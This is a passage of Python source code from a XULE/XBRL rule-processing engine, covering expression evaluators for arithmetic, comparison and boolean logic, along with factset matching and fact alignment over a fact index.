        if left.type == 'time-period' and right.type != 'time-period':
            raise XuleProcessingError(_("Incompatabile operands {} {} {}.".format(left.type, operator, right.type)),
                                      xule_context)
        do_calc = True
        # A missing required operand stops this iteration.
        if left_bar and left.type in ('unbound', 'none'):
            raise XuleIterationStop(XuleValue(xule_context, None, 'unbound'))
        if right_bar and right.type in ('unbound', 'none'):
            raise XuleIterationStop(XuleValue(xule_context, None, 'unbound'))
        if left.type in ('unbound', 'none'):
            # This is a special case for numbers. The left is none/unbound and the right is number. The new value will
            # be the negative of the right.
            if right.type in ('int', 'float', 'decimal') and '-' in operator:
                right = XuleValue(xule_context, right.value * -1, right.type)
            left = right
            do_calc = False
        if right.type in ('unbound', 'none'):
            do_calc = False
            # this ensures that if there is no value in the entire expression, the final value will be skipped.
            if left.type == 'none':
                left.type = 'unbound'
        if do_calc:
            combined_type, left_compute_value, right_compute_value = combine_xule_types(left, right, xule_context)
            if combined_type == 'unbound':
                raise XuleProcessingError(_("Incompatabile operands {} {} {}.".format(left.type, operator, right.type)),
                                          xule_context)
            if '+' in operator:
                if left.type == 'set' and right.type == 'set':
                    # use union for sets
                    left = XuleUtility.add_sets(xule_context, left, right)
                else:
                    left = XuleValue(xule_context, left_compute_value + right_compute_value, combined_type)
            elif '-' in operator:
                if left.type == 'set' and right.type == 'set':
                    left = XuleUtility.subtract_sets(xule_context, left, right)
                else:
                    left = XuleValue(xule_context, left_compute_value - right_compute_value, combined_type)
            else:
                raise XuleProcessingError(
                    _("Unknown operator '%s' found in addition/subtraction operation." % operator), xule_context)
    return left
def evaluate_comp(comp_expr, xule_context):
    """Evaluator for comparison expressions

    :param comp_expr: Rule expression for the comparison expression
    :type comp_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue

    Comparison includes ==, !=, >, < >=, <=, in, not in. Comparisons are
    applied left-to-right, the result of one comparison becoming the left
    operand of the next.
    """
    left = evaluate(comp_expr['leftExpr'], xule_context)
    # Renamed the loop variable from 'right' to 'right_side': the original
    # reused 'right' for both the rights-entry dict and the evaluated value,
    # which shadowed the entry and was inconsistent with sibling evaluators.
    for right_side in comp_expr['rights']:
        operator = right_side['op']
        right_expr = right_side['rightExpr']
        right = evaluate(right_expr, xule_context)
        interim_value = None
        # Coerce both operands to a common comparable type.
        combined_type, left_compute_value, right_compute_value = combine_xule_types(left, right, xule_context)
        if left.type in ('instant', 'duration') and right.type in ('instant', 'duration'):
            # Periods compare through the XulePeriodComp wrapper.
            left_compute_value = XulePeriodComp(left_compute_value)
            right_compute_value = XulePeriodComp(right_compute_value)
        # Collections compare via their shadow (plain Python) representation.
        if left.type in ('list', 'set'):
            left_compute_value = left.shadow_collection
        if left.type == 'dictionary':
            left_compute_value = dict(left.shadow_collection)
        if right.type in ('list', 'set'):
            right_compute_value = right.shadow_collection
        if right.type == 'dictionary':
            right_compute_value = dict(right.shadow_collection)
        if operator == '==':
            interim_value = XuleValue(xule_context, left_compute_value == right_compute_value, 'bool')
        elif operator == '!=':
            interim_value = XuleValue(xule_context, left_compute_value != right_compute_value, 'bool')
        elif operator == 'in':
            interim_value = XuleValue(xule_context, left_compute_value in right_compute_value, 'bool')
        elif operator == 'not in':
            interim_value = XuleValue(xule_context, left_compute_value not in right_compute_value, 'bool')
        elif operator in ('<', '>'):
            # Strict comparison with a missing operand yields 'none'.
            if left.type == 'none' or right.type == 'none':
                interim_value = XuleValue(xule_context, None, 'none')
            elif operator == '<':
                interim_value = XuleValue(xule_context, left_compute_value < right_compute_value, 'bool')
            elif operator == '>':
                interim_value = XuleValue(xule_context, left_compute_value > right_compute_value, 'bool')
        elif operator in ('<=', '>='):
            # none <= none / none >= none is true; one-sided none is 'none'.
            if left.type == 'none' and right.type == 'none':
                interim_value = XuleValue(xule_context, True, 'bool')
            elif left.type == 'none' or right.type == 'none':
                interim_value = XuleValue(xule_context, None, 'none')
            elif operator == '<=':
                interim_value = XuleValue(xule_context, left_compute_value <= right_compute_value, 'bool')
            elif operator == '>=':
                interim_value = XuleValue(xule_context, left_compute_value >= right_compute_value, 'bool')
        else:
            raise XuleProcessingError(_("Unknown operator '%s'." % operator), xule_context)
        left = interim_value
    return left
def evaluate_not(not_expr, xule_context):
    """Evaluator for not expressions

    Negates a boolean operand. A missing (unbound/none) operand passes
    through untouched; any other non-boolean operand is an error.

    :param not_expr: Rule expression for the not expression
    :type not_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    operand = evaluate(not_expr['expr'], xule_context)

    if operand.type in ('unbound', 'none'):
        return operand

    if operand.type == 'bool':
        return XuleValue(xule_context, not operand.value, 'bool')

    raise XuleProcessingError(
        _("The operand of the 'not' expression must be boolean, found '%s'" % operand.type), xule_context)
def evaluate_and(and_expr, xule_context):
    """Evaluator for boolean and expressions

    :param and_expr: Rule expression for the and expression
    :type and_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    value_found = False
    has_unbound = False
    left = XuleValue(xule_context, None, 'unbound')
    # Create a single list of expressions combining the left and each of the rights.
    exprs = [and_expr['leftExpr'], ] + [x['rightExpr'] for x in and_expr['rights']]
    # This process will allow unbounds if at some point a false is found. In this case the and expression is false. Otherwise, unbounds will make the result unbound.
    for expr in exprs:
        if value_found:
            # A definitive False was found - short circuit.
            break
        else:
            try:
                right = evaluate(expr, xule_context)
            except XuleIterationStop as xis:
                right = xis.stop_value
            if right.type in ('unbound', 'none'):
                has_unbound = True
            if left.type not in ('unbound', 'none', 'bool') or right.type not in ('unbound', 'none', 'bool'):
                raise XuleProcessingError(_(
                    "Operand of 'and' expression is not boolean. Left and right operand types are '%s' and '%s'." % (
                        left.type, right.type)), xule_context)
            if left.type == 'bool' and right.type == 'bool':
                left = XuleValue(xule_context, left.value and right.value, 'bool')
                if left.value == False:
                    value_found = True
            elif left.type in ('unbound', 'none') and right.type in ('unbound', 'none'):
                # Both missing - nothing to combine yet.
                continue
            elif left.type in ('unbound', 'none') and right.type == 'bool':
                # First bound boolean becomes the running value.
                left = right
                if left.value == False:
                    value_found = True
            elif left.type == 'bool' and right.type in ('unbound', 'none'):
                if left.value == False:
                    value_found = True
    # A False result survives unbound operands; otherwise any unbound operand
    # makes the whole expression unbound.
    if (has_unbound and value_found) or not has_unbound:
        return left
    else:
        return XuleValue(xule_context, None, 'unbound')
def evaluate_or(or_expr, xule_context):
    """Evaluator for boolean or expressions

    :param or_expr: Rule expression for the or expression
    :type or_expr: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValue
    """
    value_found = False
    has_unbound = False
    left = XuleValue(xule_context, None, 'unbound')
    # Create a single list of expressions combining the left and each of the rights.
    exprs = [or_expr['leftExpr'], ] + [x['rightExpr'] for x in or_expr['rights']]
    # Mirrors evaluate_and: a definitive True survives unbound operands;
    # otherwise any unbound operand makes the result unbound.
    for expr in exprs:
        if value_found:
            # A definitive True was found - short circuit.
            break
        else:
            try:
                right = evaluate(expr, xule_context)
            except XuleIterationStop as xis:
                right = xis.stop_value
            if right.type in ('unbound', 'none'):
                has_unbound = True
            if left.type not in ('unbound', 'none', 'bool') or right.type not in ('unbound', 'none', 'bool'):
                raise XuleProcessingError(_(
                    "Operand of 'or' expression is not boolean. Left and right operand types are '%s' and '%s'." % (
                        left.type, right.type)), xule_context)
            if left.type == 'bool' and right.type == 'bool':
                left = XuleValue(xule_context, left.value or right.value, 'bool')
                if left.value == True:
                    value_found = True
            elif left.type in ('unbound', 'none') and right.type in ('unbound', 'none'):
                # Both missing - nothing to combine yet.
                continue
            elif left.type in ('unbound', 'none') and right.type == 'bool':
                # First bound boolean becomes the running value.
                left = right
                if left.value == True:
                    value_found = True
            elif left.type == 'bool' and right.type in ('unbound', 'none'):
                if left.value == True:
                    value_found = True
    if (has_unbound and value_found) or not has_unbound:
        return left
    else:
        return XuleValue(xule_context, None, 'unbound')
def evaluate_factset(factset, xule_context):
    """Evaluator for a factset

    There are two flavors of factsets:

    1. Standard factset - finds facts in the instance (i.e. @Assets)
    2. Factset with inner expression - an envelope that sets up aspect
       filters for other factsets nested inside it.

    :param factset: Rule expression for the factset
    :type factset: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValueSet
    """
    # The presence of an inner expression distinguishes the envelope flavor.
    if 'innerExpr' in factset:
        return evaluate_nesting_factset(factset, xule_context)
    return evaluate_factset_detail(factset, xule_context)
def evaluate_nesting_factset(factset, xule_context):
    """Evaluate a factset envelope

    :param factset: Rule expression for the factset
    :type factset: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValueSet
    """
    aspect_filters, _x, aspect_vars = process_factset_aspects(factset, xule_context)
    # verify that there are not already filters in place
    current_filters, _x = xule_context.get_current_filters()
    current_aspects = {aspect_info[ASPECT] for aspect_info in current_filters}
    factset_aspects = {aspect_info[ASPECT] for aspect_info in aspect_filters}
    if current_aspects & factset_aspects:
        raise XuleProcessingError(_(
            "A nested factset clause cannot include aspects in an outer factset clause, found '%s'." % ", ".join(
                current_aspects & factset_aspects)), xule_context)
    # add the align aspects to the nested_filter in the context
    xule_context.filter_add('nested', aspect_filters)
    save_aligned_result_only = xule_context.aligned_result_only
    save_used_expressions = xule_context.used_expressions
    # The inner expression runs in its own aggregation sub-table.
    nested_table = xule_context.iteration_table.add_table(factset['node_id'],
                                                          xule_context.get_processing_id(factset['node_id']),
                                                          is_aggregation=True)
    nested_values = XuleValueSet()
    try:
        # Iterate the nested table, evaluating the inner expression once per
        # iteration.
        while True:
            xule_context.aligned_result_only = False
            xule_context.used_expressions = set()
            try:
                nested_value = evaluate(factset['innerExpr'], xule_context)
            except XuleIterationStop:
                nested_value = XuleValue(xule_context, None, 'unbound', tag=XuleValue(xule_context, None, 'none'))
            # Remove the envelope's filtered aspects from the alignment so
            # they do not participate in downstream alignment.
            remove_aspects = [(with_filter[0], with_filter[1]) for with_filter in aspect_filters]
            if factset.get('covered', False):
                # A covered factset strips alignment entirely (recursively).
                new_alignment = None
                remove_alignments(nested_value)
            elif xule_context.iteration_table.current_alignment is None:
                new_alignment = None
            else:
                new_alignment = remove_from_alignment(xule_context.iteration_table.current_alignment,
                                                      remove_aspects, xule_context)
            nested_value.alignment = new_alignment
            nested_value.facts = xule_context.facts.copy()
            nested_value.tags = xule_context.tags.copy()
            nested_values.append(nested_value)
            xule_context.iteration_table.next(nested_table.table_id)
            if nested_table.is_empty:
                break
    finally:
        xule_context.aligned_result_only = save_aligned_result_only
        xule_context.used_expressions = save_used_expressions
        # delete the nested table (in case it is left behind from an exception)
        xule_context.iteration_table.del_table(nested_table.table_id)
        # Remove the envelope's filters from the context.
        xule_context.filter_del()
    return nested_values
def remove_alignments(val):
    """Recursively clear alignment from a value and any contained values.

    :param val: The value to strip alignment from
    :type val: XuleValue

    Clears the alignment and aligned_result_only flags on the value itself
    and, for collections, recurses into every member. For dictionaries both
    keys and values are cleared.
    """
    val.alignment = None
    val.aligned_result_only = False
    if val.type in ('list', 'set'):
        for child_val in val.value:
            remove_alignments(child_val)
    if val.type == 'dictionary':
        for key, child_val in val.value:
            remove_alignments(key)
            # Fixed NameError: this recursed on the misspelled 'chidl_val',
            # which raised whenever a dictionary value was processed.
            remove_alignments(child_val)
def evaluate_factset_detail(factset, xule_context):
    """Evaluate a factset

    :param factset: Rule expression for the factset
    :type factset: dict
    :param xule_context: Rule processing context
    :type xule_context: XuleRuleContext
    :rtype: XuleValueSet

    The factset is divided into two parts. The first part contains aspects that will be used to filter the fact and will NOT
    be used for alignment. For example: "Assets[]" or "[lineItem=Assets]". These factsets will find all the 'Assets' facts in the
    instance, but when these facts are compared to facts in other fact sets, the 'concept' aspect will not be used to check alignment.
    Actual aspects of the fact that are not specified in the first part of the factset will be used for alignment.

    Nested alignment:
        This would be put in the context for nested factset expressions. It would cause downstream factset evaluations
        to include the filter as part of getting facts. If the filter is 'closed', it would act like a closed factset and not allow
        facts that have dimenions in fact's alignment that are not in the filter. 'open' filters wouldn't care.

        This provides an alternative mechanism for handling alignment. Instead of getting all results for each side of an operation (i.e. property)
        and then aligning them, it would allow the expression to iterate over one operand result set and evaluate for each result of the other operand.
        By pushing the filter, first, only the aligned results will come back.

    Processing outline:
        1. Evaluate the factset's aspect expressions (tracking used expressions separately).
        2. Combine nested/other/non-align filters and, for dependent factsets, filters derived from the current alignment.
        3. Pre-match facts against the fact index (factset_pre_match).
        4. Apply the where clause (process_filtered_facts), re-filtering once if alignment appears mid-evaluation (XuleReEvaluate).
        5. Add a default 'unbound' value if no None-aligned result was produced.
    """
    # f_start/f_pre_end/f_end are timing probes; currently unused but kept for instrumentation.
    f_start = datetime.datetime.today()

    # #The no alignment flag indicates that the results of the factset should all have none alignment. It is set by the 'values' expression.

    # Evaluate the aspect expressions with a fresh used_expressions set so the
    # expressions used only for aspect filtering can be captured separately.
    saved_used_expressions = xule_context.used_expressions
    xule_context.used_expressions = set()
    try:
        non_align_aspects, align_aspects, aspect_vars = process_factset_aspects(factset, xule_context)
    finally:
        # Merge the aspect-evaluation expressions back into the saved set.
        used_expressions = xule_context.used_expressions
        xule_context.used_expressions = saved_used_expressions | xule_context.used_expressions

    # check if any non_align_aspects overlap with nested_filters
    nested_factset_filters, other_filters = xule_context.get_current_filters()

    # This restriction is removed to suport rules like r1923
    # if with_aspects & factset_aspects:
    #    raise XuleProcessingError(_("The factset cannont contain any aspects in any bounding 'with' clause, found '%s'." % ", ".join(with_aspects & factset_aspects)), xule_context)

    # combine all the filtering aspects.
    all_aspect_filters = list(nested_factset_filters.items()) + list(other_filters.items()) + list(
        non_align_aspects.items())

    # If the the factset is dependent, then we only need to find facts that also match the current alignment. Create filters based on the current alignment.
    dependent_filters = list()
    if not factset.get('covered') and factset['is_dependent']:
        if xule_context.dependent_alignment is None:
            # The table may acquire the dependent alignment after evaluating the aspect filters
            xule_context.iteration_table.current_table.make_dependent()
        try:
            if xule_context.dependent_alignment is not None:
                # Convert the frozenset alignment to a dict so it can be turned into aspect filters.
                unfrozen_alignment = {k: v for k, v in xule_context.dependent_alignment}
                dependent_filters = list(alignment_to_aspect_info(unfrozen_alignment, xule_context).items())
        except IndexError:
            pass

    all_aspect_filters += list(align_aspects.items()) + dependent_filters

    '''Match facts based on the aspects in the first part of the factset and any additional filters.
       This is done by intersecting the sets of the fact_index. The fact index is a dictionary of dictionaries.
       The outer dictionary is keyed by aspect and the inner by member. So fact_index[aspect][member] contains a
       set of facts that have that aspect and member.'''
    pre_matched_facts = factset_pre_match(factset, all_aspect_filters, non_align_aspects, align_aspects, xule_context)
    pre_count1 = len(pre_matched_facts)
    f_pre_end = datetime.datetime.today()

    # For dependent factset, set flag to check if the iteration table becomes aligned.
    # Bassically, there is no alignment yet. During the evaluation of the where clause a first time evaluated variable can create alignment.
    # If this happens, the pre matched facts should only include those facts that have matching alignment. So a flag in the context is set to check if the table becomes aligned.
    # When this happens a XuleReEvaluate exception is raised (this happens in the main evaluator()).
    saved_look_for_alignment = xule_context.look_for_alignment
    saved_where_table_ids = xule_context.where_table_ids
    saved_where_dependent_iterables = xule_context.where_dependent_iterables
    if factset['is_dependent'] and xule_context.iteration_table.any_alignment is None:
        xule_context.look_for_alignment = True
        # xule_context.where_table_ids = list(xule_context.iteration_table._ordered_tables.keys())
        xule_context.where_table_ids = [table.table_id for table in
                                        xule_context.iteration_table._ordered_tables.values()]
        xule_context.where_dependent_iterables = [di['node_id'] for di in factset['dependent_iterables']]
    else:
        # set_look_for_alignment = False
        xule_context.look_for_alignment = False
    # print(factset['node_id'], fact_value, no_pre_where_alignment, xule_context.iteration_table.current_table.table_id)

    default_where_used_expressions = set()
    # recalc/recalc_none record whether a re-evaluation happened; currently informational only.
    recalc = False
    recalc_none = False
    try:
        results, default_where_used_expressions = process_filtered_facts(factset,
                                                                         pre_matched_facts,
                                                                         factset.get('covered', False),
                                                                         non_align_aspects,
                                                                         align_aspects,
                                                                         nested_factset_filters,
                                                                         aspect_vars, used_expressions, xule_context)
    except XuleReEvaluate as xac:
        recalc = True
        # turn off looking for changes during the where evaluation. At this point either there is no alignment, so the result will be empty or
        # there is alignment and the pre_matched_facts will be refiltered with the alignment. In this case, we don't need to continue looking for
        # evaluating an iterable that can produce alignment.
        xule_context.iteration_table.current_table.make_dependent()
        xule_context.look_for_alignment = False
        if xac.alignment is None:
            recalc_none = True
            # there are no matching facts in the dependent iterable (that has alignments)
            results = XuleValueSet()
        else:
            # This occurs if the alignment is created while processing where clause. Re-filter the pre_matched facts with the alignment information and try the where clause again
            # Add the alignment to the all_aspect filters
            #             if xac.alignment is None:
            #                 #in this case the no facts can match because the dependency is unaligned but would normally have alignment. This is basicaly the default value of 'unbound'
            #                 #for a factset.
            #                 results = XuleValueSet()
            #             else:
            unfrozen_alignment = {k: v for k, v in xac.alignment}
            additional_aspect_filters = list(alignment_to_aspect_info(unfrozen_alignment, xule_context).items())
            pre_matched_facts = factset_pre_match(factset, additional_aspect_filters, non_align_aspects, align_aspects,
                                                  xule_context, starting_facts=pre_matched_facts)
            # try again
            try:
                results, default_where_used_expressions = process_filtered_facts(factset, pre_matched_facts,
                                                                                 not factset.get('covered'),
                                                                                 non_align_aspects,
                                                                                 align_aspects,
                                                                                 nested_factset_filters, aspect_vars,
                                                                                 used_expressions, xule_context)
            except XuleReEvaluate as xac:
                # In the second pass, the alignment change should not happen.
                raise XuleProcessingError(
                    _("Encountered 2nd alignment change while processing the 'where' clause for a factset"),
                    xule_context)
    finally:
        # if set_look_for_alignment:
        # Restore the alignment-watching state saved above, even on exceptions.
        xule_context.look_for_alignment = saved_look_for_alignment
        xule_context.where_table_ids = saved_where_table_ids
        xule_context.where_dependent_iterables = saved_where_dependent_iterables

    if None not in results.values:
        # No result with None alignment was produced; add a default 'unbound' value.
        expr_aspect_filters = non_align_aspects.copy()
        expr_aspect_filters.update(align_aspects)
        # default_value = XuleValue(xule_context, None, 'unbound', tag=XuleValue(xule_context, tag_default_for_factset(expr_aspect_filters, xule_context), 'empty_fact'))
        default_value = XuleValue(xule_context, None, 'unbound', tag=XuleValue(xule_context, None, 'none'))
        '''The current list of facts and tags are not inlcuded on the default None fact in a factset. This was causing problems with a exists() and missing().
           The default None fact in the missing would have the tags and facts from the first evaluation, but then these would be applied on consequent
           iterations where the tags from the first iteration would overwrite the tags on the consequent iterations.'''
        # default_value.facts = xule_context.facts
        # default_value.tags = xule_context.tags
        # default_value.used_vars = get_used_vars(xule_context, xule_context.used_vars)
        default_value.used_expressions = used_expressions | default_where_used_expressions
        # print("default fact", factset['exprName'], factset['node_id'], len(xule_context.used_expressions), len(default_value.used_expressions))
        if not factset.get('covered'):
            default_value.aligned_result_only = True
        results.append(default_value)

    f_end = datetime.datetime.today()
    return results
def factset_pre_match(factset, filters, non_aligned_filters, align_aspects, xule_context, starting_facts=None):
    """Match facts based on the factset

    Match facts based on the aspects in the first part of the factset and any additional filters.
    This is done by intersecting the sets of the fact_index. The fact index is a dictionary of dictionaries.
    The outer dictionary is keyed by aspect and the inner by member. So fact_index[aspect][member] contains a
    set of facts that have that aspect and member.

    :param factset: Rule expression for the factset
    :param filters: iterable of (aspect_info, filter_member) pairs to apply
    :param non_aligned_filters: aspects in the first part of the factset (excluded from alignment)
    :param align_aspects: aspects that participate in alignment
    :param starting_facts: when supplied (second pass), intersection starts from a copy of this set
    :returns: the set of facts matching all filters
    """
    if starting_facts is None:
        pre_matched_facts = None
        first = True
    else:
        # Second pass: narrow down an existing pre-match rather than starting fresh.
        pre_matched_facts = copy.copy(starting_facts)
        first = False
    # first = pre_matched_facts is None
    for aspect_info, filter_member in filters:
        # Handle case where the filter only contains boolean values. Treat the filter_member as true.
        # For example: @concept.is-numeric This should be treated as @concept.is-numeric=true
        if (filter_member is None and
                aspect_info[ASPECT_OPERATOR] is None and
                aspect_info[SPECIAL_VALUE] is None and
                aspect_info[ASPECT_PROPERTY] is not None):
            aspect_info = list(aspect_info)
            aspect_info[ASPECT_OPERATOR] = '='
            filter_member = XuleValue(xule_context, True, 'bool')

        if filter_member is not None:
            #             if aspect_info[ASPECT_PROPERTY] is None:
            #                 index_key = (aspect_info[TYPE], aspect_info[ASPECT])
            #             else:
            #                 # aspect_info[ASPECT_PROPERTY][0] is the aspect property name
            #                 # aspect_info[ASPECT_PROPERTY][1] is a tuple of the arguments
            #                 index_key = ('property', aspect_info[ASPECT], aspect_info[ASPECT_PROPERTY][0]) + \
            #                             aspect_info[ASPECT_PROPERTY][1]
            #                 if index_key not in xule_context.fact_index and index_key not in _FACT_INDEX_PROPERTIES:
            #                     raise XuleProcessingError(_(
            #                         "Factset aspect property '{}' is not a valid property of aspect '{}'.".format(index_key[2],
            #                                                                                                       index_key[1])),
            #                         xule_context)
            index_key = fact_index_key(aspect_info, xule_context)
            facts_by_aspect = set()

            '''THIS MIGHT BE MORE EFFICIENTLY HANDLED BY IGNORING THE ASPECT IF THE MEMBER IS None OR ELIMINATING ALL FACTS'''
            # When the aspect key is not in the fact index, then the instance doesn't use this aspect (dimension). So create an entry for the 'None' key and put all the facts in it.
            if index_key not in xule_context.fact_index:
                xule_context.fact_index[index_key][None] = xule_context.fact_index['all']

            if aspect_info[SPECIAL_VALUE] is not None:
                if aspect_info[SPECIAL_VALUE] == '*':
                    if aspect_info[ASPECT_OPERATOR] == '=':
                        if aspect_info[TYPE] == 'builtin' and aspect_info[ASPECT] in ('concept', 'period', 'entity') and aspect_info[ASPECT_PROPERTY] is None:
                            # this is all facts
                            continue
                        else:
                            # need to combine all the facts that have that aspect
                            facts_by_aspect = set(it.chain.from_iterable(
                                v for k, v in xule_context.fact_index[index_key].items() if k is not None))
                    else:  # the operator is != ('in' and 'not in' are not allowed with a special value)
                        if aspect_info[TYPE] == 'builtin' and aspect_info[ASPECT] in ('concept', 'period', 'entity'):
                            # No facts can match these aspects not equal to * (i.e. @concept != *)
                            pre_matched_facts = []
                            break
                        else:
                            # Facts that do not carry the aspect are indexed under the None member.
                            facts_by_aspect = xule_context.fact_index[index_key][None]
            else:
                if aspect_info[ASPECT_OPERATOR] == 'in' and filter_member.type not in ('list', 'set'):
                    raise XuleProcessingError(_("The value for '%s' with 'in' must be a set or list, found '%s'" % (
                        index_key[ASPECT], filter_member.type)), xule_context)

                # fix for aspects that take qname members (concept and explicit dimensions. The member can be a concept or a qname. The index is by qname.
                if index_key in (('builtin', 'concept'), ('property', 'cube', 'name')):
                    if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
                        member_values = {convert_value_to_qname(filter_member, xule_context), }
                    else:
                        member_values = {convert_value_to_qname(x, xule_context) for x in filter_member.value}
                elif index_key[TYPE] == 'explicit_dimension':
                    if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
                        if filter_member.type == 'concept':
                            member_values = {convert_value_to_qname(filter_member, xule_context), }
                        else:
                            member_values = {filter_member.value, }
                    else:
                        member_values = {convert_value_to_qname(x, xule_context) if x.type == 'concept' else x.value for x
                                         in filter_member.value}
                # Also fix for period aspect
                elif index_key == ('builtin', 'period'):
                    if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
                        member_values = {convert_value_to_model_period(filter_member, xule_context), }
                    else:
                        member_values = {convert_value_to_model_period(x, xule_context) for x in filter_member.value}
                # Allow units to be a qname or a xule 'unit'
                elif index_key == ('builtin', 'unit'):
                    conversion_function = lambda x: XuleUnit(x) if x.type == 'qname' else x.value
                    if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
                        member_values = {conversion_function(filter_member), }
                    else:
                        member_values = {conversion_function(x) for x in filter_member.value}
                # Allow @table.drs-role to take a short role name
                elif index_key == ('property', 'cube', 'drs-role'):
                    if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
                        member_values = {convert_value_to_role(filter_member, xule_context), }
                    else:
                        member_values = {convert_value_to_role(x, xule_context) for x in filter_member.value}
                else:
                    if aspect_info[ASPECT_OPERATOR] in ('=', '!='):
                        member_values = {filter_member.value, }
                    else:
                        member_values = {x.value for x in filter_member.value}
                '''THIS COULD USE THE SHADOW COLLECTION
                member_values = set(filter_member.shadow_collection)
                '''
                if aspect_info[ASPECT_OPERATOR] in ('=', 'in'):
                    found_members = member_values & xule_context.fact_index[index_key].keys()
                else:  # aspect operator is '!=' or 'not in'
                    # None is excluded: a fact without the aspect never matches a != / not in filter.
                    found_members = (xule_context.fact_index[index_key].keys() - {None, }) - member_values
                for member in found_members:
                    facts_by_aspect |= xule_context.fact_index[index_key][member]

            # intersect the facts with previous facts by aspect
            if first:
                first = False
                pre_matched_facts = facts_by_aspect
            else:
                pre_matched_facts &= facts_by_aspect

    if first:
        # there were no aspects to start the matching, so use the full set
        # pre_matched_facts = xule_context.model.factsInInstance
        pre_matched_facts = xule_context.fact_index['all']

    if starting_facts is None:
        # Check the alignment of pre matched facts to the dependent alignment
        if xule_context.dependent_alignment is not None and factset.get('is_dependent', False):
            match_aligned_facts = set()
            for fact in pre_matched_facts:
                fact_alignment = calc_fact_alignment(factset, fact, non_aligned_filters, align_aspects, True, xule_context)
                if fact_alignment == xule_context.dependent_alignment:
                    match_aligned_facts.add(fact)
            pre_matched_facts = match_aligned_facts
    '''
    #This code reduces the pre matched facts to those that match alignment of the dependent alignment by using the fact index of dimensions that are not
    #in the dependent alignment. The method of checking the alignment used above proved to be more efficient. However, it may be that if the pre match includes a large number
    #of facts this method may be better.
    if xule_context.dependent_alignment is not None and factset.is_dependent:
        if not hasattr(factset, 'empty_dimension_list'):
            aligned_dimensions = [(k[0], k[1]) for k, v in aligned_filters if k[0] == 'explicit_dimension']
            empty_dimensions = [k for k in xule_context.fact_index.keys() if k[0] == 'explicit_dimension' and k not in aligned_dimensions]
            factset.empty_dimension_list = empty_dimensions
        for empty_dim_key in factset.empty_dimension_list:
            pre_matched_facts &= xule_context.fact_index[empty_dim_key][None]
    '''
    return pre_matched_facts
def fact_index_key(aspect_info, xule_context):
    """Build the key used to look up an aspect filter in the fact index.

    A plain aspect yields a (type, aspect) pair. An aspect property (e.g.
    @concept.local-name) yields ('property', aspect, property name, *args).
    Raises XuleProcessingError when a property key is neither in the fact
    index nor in _FACT_INDEX_PROPERTIES (the 'attribute' property is exempt).
    """
    aspect_property = aspect_info[ASPECT_PROPERTY]
    if aspect_property is None:
        return (aspect_info[TYPE], aspect_info[ASPECT])

    # aspect_property[0] is the aspect property name,
    # aspect_property[1] is the tuple of property arguments.
    property_name = aspect_property[0]
    index_key = ('property', aspect_info[ASPECT], property_name) + aspect_property[1]
    key_is_known = index_key in xule_context.fact_index or index_key in _FACT_INDEX_PROPERTIES
    if not key_is_known and property_name != 'attribute':
        raise XuleProcessingError(_(
            "Factset aspect property '{}' is not a valid property of aspect '{}'.".format(index_key[2],
                                                                                          index_key[1])),
            xule_context)
    return index_key
def calc_fact_alignment(factset, fact, non_aligned_filters, align_aspects_filters, frozen, xule_context):
    """Return a fact's alignment for a factset, memoized per (factset node, fact).

    Both forms of the alignment are cached as a (frozen, unfrozen) pair:
    the frozenset of items and the plain dict. The *frozen* flag selects
    which form is returned. For a covered factset whose computed alignment
    is empty, both forms are None.
    """
    cache = xule_context.fact_alignments[factset['node_id']]
    if fact in cache:
        frozen_form, unfrozen_form = cache[fact]
        return frozen_form if frozen else unfrozen_form

    # Not cached yet - compute the alignment from the filters.
    unfrozen_alignment = get_alignment(fact,
                                       non_aligned_filters,
                                       align_aspects_filters,
                                       xule_context,
                                       factset.get('coveredDims', False),
                                       factset.get('covered', False))
    if factset.get('covered', False) and len(unfrozen_alignment) == 0:
        # A fully covered factset with nothing left to align has no alignment at all.
        unfrozen_alignment = None
        fact_alignment = None
    else:
        fact_alignment = frozenset(unfrozen_alignment.items())
    cache[fact] = (fact_alignment, unfrozen_alignment)
    return fact_alignment if frozen else unfrozen_alignment
def process_filtered_facts(factset, pre_matched_facts, current_no_alignment, non_align_aspects, align_aspects,
                           nested_filters, aspect_vars, pre_matched_used_expressoins_ids, xule_context):
    """Apply the where portion of the factset

    For each pre-matched fact: optionally skip nils, compute alignment,
    push nested-filter aspects back into the alignment, enforce closed
    factsets and dependent alignment, apply nil defaulting, and finally
    evaluate the where clause (if any) with the aspect variables and $fact
    bound. Returns (XuleValueSet of matching fact values, set of expressions
    used during where evaluation).
    """
    results = XuleValueSet()
    default_used_expressions = set()

    for model_fact in pre_matched_facts:
        # assume the fact will matach the where clause.
        matched = True

        # check if nill - nils are excluded when the factset or the processor options say so,
        # unless the factset explicitly includes them.
        exclude_nils = (factset.get('excludeNils', False) or
                        (getattr(xule_context.global_context.options, "xule_exclude_nils", False) and not factset.get(
                            'includeNils', False))
                        )
        if exclude_nils and model_fact.isNil:
            # if not xule_context.include_nils and model_fact.isNil:
            continue

        '''The alignment is all the aspects that were not specified in the first part of the factset (non_align_aspects).'''
        # set up potential fact result
        alignment = calc_fact_alignment(factset, model_fact, non_align_aspects, align_aspects, False, xule_context)

        '''If we are in a innner factset, the alignment needs to be adjusted. Each aspect in the outer factset should be in the alignment even if
           if it is in the factset aspects (which would normally take that aspect out of the alignment).'''
        for nested_aspect_info in nested_filters:
            alignment_info = (nested_aspect_info[TYPE], nested_aspect_info[ASPECT])
            if alignment is None or alignment_info not in alignment:
                if alignment_info == ('builtin', 'concept'):
                    alignment_value = model_fact.qname
                    # alignment_value = model_fact.elementQname
                elif alignment_info == ('builtin', 'unit'):
                    # NOTE(review): non-numeric facts leave alignment_value from a previous
                    # iteration (or unset) here - appears to rely on units only filtering numeric facts.
                    if model_fact.isNumeric:
                        alignment_value = model_to_xule_unit(model_fact.unit, xule_context)
                elif alignment_info == ('builtin', 'period'):
